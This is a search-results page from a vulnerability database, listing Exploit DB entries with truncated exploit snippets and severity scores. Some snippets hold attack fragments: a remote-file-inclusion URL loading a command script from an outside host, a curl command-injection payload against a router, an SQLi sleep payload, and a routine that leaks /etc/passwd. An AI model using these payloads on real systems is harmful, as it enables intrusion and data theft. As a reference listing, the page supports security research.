Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2021/04/02 12:0 a.m.638 views

ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation

Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation Date: 31.01.2021 Exploit Author: LiquidWorm Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com Vendor: Zhejiang BC&TV Technology Co., Ltd. ZBL | W&D Corporation WAD TECHNOLOGY THAILAND Product web page...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/02 12:0 a.m.638 views

Student Record System 4.0 - 'cid' SQL Injection

Exploit Title: Student Record System 4.0 - 'cid' SQL Injection Date: 2/2/2021 Exploit Author: Jannick Tiger Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/wp-content/uploads/2019/05/schoolmanagement.zip Version: V 4.0 Tested on: Windows、XAMPP Identify the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/04/01 12:0 a.m.636 views

Latrix 0.6.0 - 'txtaccesscode' SQL Injection

Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection Date: 03/30/2021 Exploit Author: cptsticky Vendor Homepage: https://sourceforge.net/projects/latrix Software Link: https://sourceforge.net/projects/latrix/files/latest/download Version: 0.6.0 Tested on: Ubuntu 20.04 POST...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/17 12:0 a.m.636 views

OpenCTI 3.3.1 - Directory Traversal

Exploit Title: OpenCTI 3.3.1 - Directory Traversal Date: 2020-03-05 Exploit Author: Raif Berkay Dincel Vendor Homepage: www.opencti.io/ Software https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1 Version: 3.3.1 CVE-ID: N/A Tested on: Linux Mint / Windows 10 Vulnerabilities Discovered...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/03 12:0 a.m.635 views

Online Matrimonial Project 1.0 - Authenticated Remote Code Execution

Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution Exploit Author: Valerio Alessandroni Date: 2020-10-07 Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ Source Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/04/21 12:0 a.m.634 views

Fast PHP Chat 1.3 - 'my_item_search' SQL Injection

Exploit Title: Fast PHP Chat 1.3 - 'myitemsearch' SQL Injection Date: 15/04/2021 Exploit Author: Fatih Coskun Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076 Version: 1.3 Category: Webapps Tested on: Kali linux Description : The vulnerability allows a...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/06/21 12:0 a.m.633 views

iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path

Exploit Title: iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path Date: 2021-06-18 Exploit Author: Julio Aviña Vendor Homepage: https://www.i-funbox.com/en/index.html Software Link: https://www.i-funbox.com/download/ifunboxsetup4.2.exe Version: 4.2 Service File Version: 486.0.2.23...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/09/15 12:0 a.m.633 views

ThinkAdmin 6 - Arbitrarily File Read

Exploit Title: ThinkAdmin 6 - Arbitrarily File Read Google Dork: N/A Date: 2020-09-14 Exploit Author: Hzllaga Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/ Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a Version: v6 =...

7.5CVSS7.6AI score0.75881EPSS
Exploits5
Exploit DB
Exploit DB
added 2020/06/23 12:0 a.m.633 views

Responsive Online Blog 1.0 - 'id' SQL Injection

Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection Date: 2020-06-23 Exploit Author: Eren Şimşek Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/12/30 12:0 a.m.633 views

elearning-script 1.0 - Authentication Bypass

Exploit Title: elearning-script 1.0 - Authentication Bypass Author: riamloo Date: 2019-12-29 Vendor Homepage: https://github.com/amitkolloldey/elearning-script Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip Version: 1 CVE: N/A Tested on: Win 10 Discription: E...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/08/13 12:0 a.m.632 views

4images 1.8 - 'limitnumber' SQL Injection (Authenticated)

Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection Authenticated Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.8 Tested on: Linux Source Analysis: Line 658 - User action defined if $action == "findimages" Line 661 - Vulnerable condition...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/04/13 12:0 a.m.632 views

Blitar Tourism 1.0 - Authentication Bypass SQLi

Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi Date: 13 April 2021 Exploit Author: sigeri94 Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/ Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master Version: 1....

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/17 12:0 a.m.631 views

Nxlog Community Edition 2.10.2150 - DoS (Poc)

Exploit Title: Nxlog Community Edition 2.10.2150 - DoS Poc Date: 15/12/2020 Exploit Author: Guillaume PETIT Vendor Homepage: https://nxlog.co Software Link: https://nxlog.co/products/nxlog-community-edition/download Version: 2.10.2150 Tested on: Linux Debian 10 && Windows Server 2019 CVE:...

7.5CVSS7.7AI score0.07599EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/10/09 12:0 a.m.631 views

DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)

Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting Authenticated Date: 2020-10-09 Exploit Author: Enes Özeser Vendor Homepage: https://dynpg.org/ Version: 4.9.1 Tested on: Windows & XAMPP == Tutorial alert"XSS"; == HTTP Request alert"XSS";...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/11/16 12:0 a.m.630 views

Online Learning System 2.0 - Remote Code Execution (RCE)

Exploit Title: Online Learning System 2.0 - Remote Code Execution RCE Date: 15/11/2021 Exploit Author: djebbaranon Vendor Homepage: https://github.com/oretnom23 Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearningv20.zip Version: 2.0 Tested on: Kali linux...

9.8CVSS9.7AI score0.09985EPSS
Exploits4
Exploit DB
Exploit DB
added 2021/11/03 12:0 a.m.630 views

Eclipse Jetty 11.0.5 - Sensitive File Disclosure

Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure Date: 2021-11-03 Exploit Author: Mayank Deshmukh Vendor Homepage: https://www.eclipse.org/jetty/ Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/ Version: 9.4.37 ≤ version ColdFusionX - Web Applicat...

5.3CVSS6.5AI score0.99298EPSS
Exploits6
Exploit DB
Exploit DB
added 2021/04/05 12:0 a.m.630 views

Simple Food Website 1.0 - Authentication Bypass

Exploit Title: Simple Food Website 1.0 - Authentication Bypass Date: 2021-04-03 Exploit Author: Viren Saroha illusion Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/05/27 12:0 a.m.630 views

osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting

Exploit Title: osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting Date: 2020-06-26 Exploit Author: Matthew Aberegg Vendor Homepage: https://osticket.com Patch Link: https://github.com/osTicket/osTicket/commit/d54cca0b265128f119b6c398575175cb10cf1754 Version: osTicket 1.14.1 Tested o...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/02/13 12:0 a.m.630 views

Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting

Exploit Title: Jiofi 4 JMR 1140 Reflected Cross Site Scripting Date: 12.02.2019 Exploit Author: Ronnie T Baby Contact:https://www.linkedin.com/in/ronnietbaby Vendor Homepage: www.jio.com Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 Category: Hardware Wifi Router Version:...

6.1CVSS6.4AI score0.0155EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/02/27 12:0 a.m.629 views

Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)

Exploit Title: Wordpress Plugin Canto " def createadminfilelocaldir, localshell=None: if not os.path.existslocaldir: os...

9.8CVSS9.4AI score0.0562EPSS
Exploits7
Exploit DB
Exploit DB
added 2020/11/12 12:0 a.m.629 views

Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow

Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow Date: 2020-07-30 Author: Felipe Winsnes Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe Version: 2.6.18 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Proof of Concept: 1.- Run...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/23 12:0 a.m.628 views

LifeRay 7.2.1 GA2 - Stored XSS

Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS Date: 10/05/2020 Exploit Author: 3ndG4me Vendor Homepage: https://www.liferay.com/ Software Link: https://www.liferay.com/ Version: 7.1.0 - 7.2.1 GA2 REQUIRED Tested on: Debian Linux CVE : CVE-2020-7934 Public Exploit/Whitepaper:...

5.4CVSS5.8AI score0.04457EPSS
Exploits3
Exploit DB
Exploit DB
added 2019/06/19 12:0 a.m.627 views

BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution

Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1. Description ============== BlogEngine.NET is vulnerable to a Directory Traversal through th...

8.8CVSS8.9AI score0.07595EPSS
Exploits11
Exploit DB
Exploit DB
added 2012/10/10 12:0 a.m.627 views

Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Webmin /file/show.cgi Remote Command...

6.5CVSS7AI score0.61925EPSS
Exploits10
Exploit DB
Exploit DB
added 2021/01/04 12:0 a.m.626 views

Wordpress Core 5.2.2 - 'post previews' XSS

Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS Date: 31/12/2020 Exploit Author: gx1 Vulnerability Discovery: Simon Scannell Vendor Homepage: https://wordpress.com/ Software Link: https://github.com/WordPress/WordPress Version: = 5.2.2 Tested on: any CVE: CVE-2019-16223 References:...

5.4CVSS6.1AI score0.05181EPSS
Exploits3
Exploit DB
Exploit DB
added 2016/11/01 12:0 a.m.626 views

MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition

/ Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c ver. 1.0...

7CVSS6.9AI score0.04313EPSS
Exploits18
Exploit DB
Exploit DB
added 2009/11/16 12:0 a.m.626 views

Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow

!/usr/bin/python HP Power Manager Administration Universal Buffer Overflow Exploit CVE 2009-2685 Tested on Win2k3 Ent SP2 English, Win XP Sp2 English Matteo Memelli ryujin A-T offensive-security.com www.offensive-security.com Spaghetti & Pwnsauce - 07/11/2009 ryujin@bt:$ ./hppowermanager.py...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/12 12:0 a.m.625 views

Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection

Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/07/26 12:0 a.m.625 views

Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LNK Remote Code Execution Vulnerability', 'Description' = %q This module exploits a vulnerability in the handling of Windows Shortcut files .LNK...

6.7AI score
Exploits0
Exploit DB
Exploit DB
added 2024/04/02 12:0 a.m.624 views

Elementor Website Builder < 3.12.2 - Admin+ SQLi

EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test',metakey='key4'where+metaid=SLEEP2; Press "Replace URL" on the Replace URL page. Burp...

7.2CVSS7AI score0.19695EPSS
Exploits7
Exploit DB
Exploit DB
added 2021/11/03 12:0 a.m.624 views

Fuel CMS 1.4.1 - Remote Code Execution (3)

Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution 3 Exploit Author: Padsala Trushal Date: 2021-11-03 Vendor Homepage: https://www.getfuelcms.com/ Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 Version: ',epilog=f'EXAMPLE - python3 sys.argv0 -u http://10.10.21.74'...

9.8CVSS9.8AI score0.82937EPSS
Exploits17
Exploit DB
Exploit DB
added 2014/11/03 12:0 a.m.624 views

PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection

Exploit Title: PHP 5.x Shellshock Exploit bypass disablefunctions Google Dork: none Date: 10/31/2014 Exploit Author: Ryan King Starfall Vendor Homepage: http://php.net Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror Version: 5. tested on 5.6.2 Tested on: Debian 7 and CentOS 5 an...

10CVSS9.2AI score0.99999EPSS
Exploits131
Exploit DB
Exploit DB
added 2020/10/09 12:0 a.m.623 views

openMAINT 1.1-2.4.2 - Arbitrary File Upload

Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload Dork: N/A Date: 2020-08-19 Exploit Author: mrb3n Vendor Homepage: https://www.openmaint.org/en Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download Version: 1.1-2.4.2 Category: Webapps Teste...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/03/18 12:0 a.m.623 views

Netlink GPON Router 1.0.11 - Remote Code Execution

Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls /&waninf=1INTERNETRVID154"...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/10/02 12:0 a.m.623 views

Dnsmasq < 2.78 - 2-byte Heap Overflow

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open three terminals docker build -t dnsmasq . docker run --rm -t -i...

9.8CVSS9.1AI score0.84925EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/07/26 12:0 a.m.622 views

F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion

Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Date: 2019-08-17 Exploit Author: Carlos E. Vieira Vendor Homepage: https://www.f5.com/products/big-ip-services Version: 0: return True else: return False else: return False def leakPasswd: print"+ Leaking /etc/passwd from server"...

10CVSS10AI score0.99999EPSS
Exploits60
Exploit DB
Exploit DB
added 2017/09/30 12:0 a.m.622 views

Microsoft Excel - OLE Arbitrary Code Execution

Title: MS Office Excel all versions Arbitrary Code Execution Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007,2010,2013,2016 32/64 bits x86 and x64 Tested on: Windows...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/10/29 12:0 a.m.621 views

WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)

Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting XSS Date: 4/07/2021 Exploit Author: 3ndG4me Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/ Version: 6.5 and Below CVE : CVE-2021-31682 --Summary-- The login portal for the...

6.1CVSS6.5AI score0.10509EPSS
Exploits4
Exploit DB
Exploit DB
added 2020/09/07 12:0 a.m.621 views

Cabot 0.11.12 - Persistent Cross-Site Scripting

Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting Date: 2020-09-06 Exploit Author: Abhiram V Vendor Homepage: https://cabotapp.com/ Software Link: https://github.com/arachnys/cabot Version: 0.11.12 Tested on: Ubuntu Linux Introduction Cabot is a free, open-source, self-hosted...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2009/12/23 12:0 a.m.621 views

CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution

Package name: CoreHTTP server Version: 0.5.3.1 and below as long as cgi support is enabled Software URL: http://corehttp.sourceforge.net/ Exploit: http://aconole.brad-x.com/programs/corehttpcgienabled.rb Issue: CoreHTTP server fails to properly sanitize input before calling popen and allows an...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/23 12:0 a.m.620 views

Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection

Exploit Title: Stock Management System 1.0 - SQL Injection Dork: N/A Date: 2020-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html Version: 1.0 Tested on: Linux CVE: N/A POC: ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/17 12:0 a.m.620 views

Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)

Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow Unicode SEH PoC Vendor Homepage: http://www.codeblocks.org/ Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download Exploit Author: Paras Bhatia...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/05/11 12:0 a.m.620 views

OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting

Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting Date: 2020-05-11 Exploit Author: Vulnerability-Lab Vendor: https://www.openz.de/ https://www.openz.de/download.html Document Title: =============== OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability References Source:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/01/07 12:0 a.m.619 views

ECSIMAGING PACS 6.21.5 - SQL injection

Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection Date: 06/01/2021 Exploit Author: shoxxdj Vendor Homepage: https://www.medicalexpo.fr/ Version: 6.21.5 and bellow tested on 6.21.5,6.21.3 Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/11/03 12:0 a.m.618 views

RDP Manager 4.9.9.3 - Denial-of-Service (PoC)

Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service PoC Date: 2021-10-18 Exploit Author: Vulnerability Lab Vendor Homepage: https://www.cinspiration.de/uebersicht4.html Software Link: https://www.cinspiration.de/download.html Version: 4.9.9.3 Tested on: Linux Document Title: =============== RD...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/04/14 12:0 a.m.618 views

Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)

Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection Authentication Bypass Date: 13 April 2021 Exploit Author: Galuh Muhammad Iman Akbar GaluhID Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/11 12:0 a.m.618 views

Medical Center Portal Management System 1.0 - Multiple Stored XSS

Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS Exploit Author: Saeed Bala Ahmed r0b0tG4nG Date: 2020-12-10 Google Dork: N/A Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/30 12:0 a.m.618 views

Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion

Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-30...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/11/15 12:0 a.m.617 views

SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)

Exploit Title: SOPlanning 1.52.01 Simple Online Planning Tool - Remote Code Execution RCE Authenticated Date: 6th October, 2024 Exploit Author: Ardayfio Samuel Nii Aryee Version: 1.52.01 Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/10/19 12:0 a.m.617 views

WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)

Exploit Title: WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting XSS Google Dork: "inurl:avia-element-paging" Date: 18/10/2021 Exploit Author: Francisco Díaz-Pache Alonso, Sergio Corral Cristo and David Álvarez Robles Vendor Homepage: https://kriesi.at/ Version: Enfold This URL must...

6.1CVSS6.3AI score0.02959EPSS
Exploits5
Total number of security vulnerabilities5000